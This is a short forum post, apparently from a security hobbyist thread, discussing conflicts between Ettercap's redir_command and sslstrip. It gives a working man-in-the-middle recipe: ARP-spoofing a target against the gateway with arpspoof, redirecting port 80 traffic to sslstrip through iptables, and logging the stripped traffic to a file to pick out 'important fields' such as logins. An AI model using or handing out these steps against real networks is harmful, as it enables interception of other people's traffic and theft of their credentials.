If we are using sslstrip, why uncomment redir_command? That command is supposed to sniff SSL traffic, and if we are already using sslstrip, that will bring conflicts between the two, right? Maybe because of that, many people here are having problems with messages saying the cert isn't valid (because that is how redir_command works to get SSL info, from what I know).
Originally Posted by g0tmi1k
Also, Ettercap forwards all traffic automatically when sniffing. I don't know any command to make it stop doing that, which means that if we have ip_forward=1 and Ettercap running, we are forwarding traffic twice (you can confirm this in Wireshark). Not pretty.
If I use sslstrip, I do just this:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -w sslsniff.txt (so it writes to a file)
Then just open the file and look for the important fields; it's not difficult.
Note that to flush iptables, the command
will not work (at least for me).
You have to use
iptables -t nat --flush